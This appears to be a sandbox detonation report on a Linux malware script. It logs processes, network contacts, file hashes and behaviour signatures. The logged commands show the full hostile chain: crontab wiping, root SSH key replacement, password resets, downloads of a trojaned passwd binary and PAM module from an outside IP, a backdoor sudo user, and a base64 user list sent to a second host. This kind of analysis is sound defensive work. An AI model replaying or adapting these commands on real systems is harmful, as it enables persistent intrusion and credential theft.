[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.Kvgac8gTFX /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.Kvgac8gTFX]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/tr

[tr \n ]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/xrx/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
CH 179.43.154.189:1010 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/4104

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.Kvgac8gTFX

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 d7f0864275277cd007532a69de0bb969
SHA1 3eba640a166a326b34d0175c51edd6eba33f9460
SHA256 e563dcb02ff3f853d10b7859b126d1705f2e27df89556662a2931a18b8d3bafd
SHA512 e8a0f76dcc12c5e4147832774e6e7c0cda09f231057cb0e80233c7927146a7ba0ff0b18363c6e50a57059235d4384348486377ad53776cf7c7f5b6b0a4ef76f6

/etc/shadow+

MD5 58b187fc10137fd5ca7a8b4a724300ee
SHA1 5394e98da4b5a2aef6fc4e05f40e0203a4805439
SHA256 c4c5fe11e6ad6a9f24716c33e561763192c9c8b1c7fa81494898529d6e4f4855
SHA512 b41dc0d6e8732f7a24eea077331d22c3875168ca20f2243569a2893be7cca5061537a2484f1097f4cc148cd9e8b03004513714b970ccc92e8f5c401e743009ac

/etc/passwd+

MD5 1a2923599c03f2da0e70bc13fc7d2fcb
SHA1 7c850050beffefcd03cee16c3f74cbe63c7f9680
SHA256 bbe8f1dd9974aba408b38e18b0628341bbec08f2493973ff9b6446fa03701823
SHA512 5d8f456ad7bd9a9e4bbf677b03665ee22f1ed9479ea1fbceb004e97dbcdd9a84248c32e017b786fede7baf037c2249078e2e24bc38215d8d4f099f773494fa80

/etc/shadow+

MD5 cebff192afb08821d19a25039edc6af3
SHA1 da79d671c4d01bf02e22ce0b06c4567e1326d367
SHA256 459b3d9ebe3dc0123f0f90f99cb72485f24944f1011aaa5669686e5eb1312e3f
SHA512 6f942dab13165ddb94587c5e3887e6e77dee598fbd7159bad31690d62766c239493d93bab6fcea29f0c6c56ae81029b4f7cd5bdead79225b2ed244a1b35e9a5f

/etc/group+

MD5 b43bcab2b519b1f1d699ab5c9dc418eb
SHA1 e983ed6f5c31b3706b9d3eaf5efdcfe932d653bc
SHA256 4f94732b04d039e70819b986801ab8bb50cc056284e4b4536d46beca0f546f43
SHA512 87999a80f6d7eee4761fd0bb4948235a3133354916ee9ccb8c30eef97a895245959c3bbc7574afbea2f5071194743c15526a7d627d6e2e3edd6ff31a3bf059e9

/etc/gshadow+

MD5 9452ee212552c9f49ebca01b6291a740
SHA1 85e33b01e1d041ad6809067ed50b1770c9be478f
SHA256 363cd5c14472d9750701c768b7657d191e8e76b899b83aca2366ec6c82481669
SHA512 0427539b0dc8fd4c62a0389062a9868615f8cdd21ef4f248dc84ce999f647936b95492377e8655ad903addda37f4c8edea09a1ffdd2e7c014825e62fbfd68f7a

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 84eb5d846ee7bfef527db974a5feb1b2
SHA1 e811387fb348ab546f82d60d66a0c9a9c9735d36
SHA256 c11f30bbdc83688d1329289c0f5324e9aa0b0b81365eb6375b953103a2c43456
SHA512 f1fbc838ce695cb448038b8732fb054fd6f5502b6203377eb339e5bcbb8eb877c4f8c10ba5c30591eab82de3603c0a228243dfda7611eff3ae14d9813d69a25b

/etc/gshadow+

MD5 5c0e7d545ff1cfa0ba68f27349507a87
SHA1 0aa5fc2c5a8e1be03ce1bf2b4e68b82de1eb8d47
SHA256 0e4b06466a4c58fbf83afd9939466b7c2a461c27ee876cbec97afae04e53e44b
SHA512 2913398db0dcd7d719c1b455d6d62797f042f99fe8653b97bd36d3354d659d05e400b8d3729254ec793ed37876d0045628f9bd26ba566e1a4bb86c3df39b1954

/etc/shadow+

MD5 af71400bbb59d689a6d8ca145ee6a868
SHA1 6e12abb9495328fc5e424edf26998397382cd5bb
SHA256 37482af0ac86aab195e1cc081ef8ed740ea79573baf8ee14b5d80a5048367e6a
SHA512 197fc4c72429864863c9bbb6581af2f31cb5653b279c347affdace02e3668e3582f94a157a7c9ad95846e84cc8c65fde383e9d9dbd9e59ab7fb6f564d3667fea

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

148s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

Signatures

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/usermod N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/390/maps /usr/sbin/needrestart N/A
File opened for reading /proc/781/maps /usr/sbin/needrestart N/A
File opened for reading /proc/833/maps /usr/sbin/needrestart N/A
File opened for reading /proc/358/maps /usr/sbin/needrestart N/A
File opened for reading /proc/751/maps /usr/sbin/needrestart N/A
File opened for reading /proc/792/maps /usr/sbin/needrestart N/A
File opened for reading /proc/794/maps /usr/sbin/needrestart N/A
File opened for reading /proc/829/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/419/maps /usr/sbin/needrestart N/A
File opened for reading /proc/440/maps /usr/sbin/needrestart N/A
File opened for reading /proc/580/maps /usr/sbin/needrestart N/A
File opened for reading /proc/586/maps /usr/sbin/needrestart N/A
File opened for reading /proc/736/maps /usr/sbin/needrestart N/A
File opened for reading /proc/761/maps /usr/sbin/needrestart N/A
File opened for reading /proc/831/maps /usr/sbin/needrestart N/A
File opened for reading /proc/589/maps /usr/sbin/needrestart N/A
File opened for reading /proc/723/maps /usr/sbin/needrestart N/A
File opened for reading /proc/727/maps /usr/sbin/needrestart N/A
File opened for reading /proc/791/maps /usr/sbin/needrestart N/A
File opened for reading /proc/893/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1935/ctty /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1830/stat /usr/bin/pkill N/A
File opened for reading /proc/52/ctty /usr/bin/pkill N/A
File opened for reading /proc/17/cgroup /usr/bin/pkill N/A
File opened for reading /proc/276/status /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1751/maps /usr/sbin/needrestart N/A
File opened for reading /proc/39/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1830/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2292/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1121/cgroup /usr/bin/pkill N/A
File opened for reading /proc/386/stat /usr/bin/pkill N/A
File opened for reading /proc/458/ctty /usr/bin/pkill N/A
File opened for reading /proc/586/stat /usr/bin/pkill N/A
File opened for reading /proc/200/stat /usr/bin/pkill N/A
File opened for reading /proc/46/status /usr/sbin/needrestart N/A
File opened for reading /proc/586/environ /usr/sbin/needrestart N/A
File opened for reading /proc/5/ctty /usr/bin/pkill N/A
File opened for reading /proc/198/status /usr/bin/pkill N/A
File opened for reading /proc/1081/stat /usr/bin/pkill N/A
File opened for reading /proc/2175/cgroup /usr/bin/pkill N/A
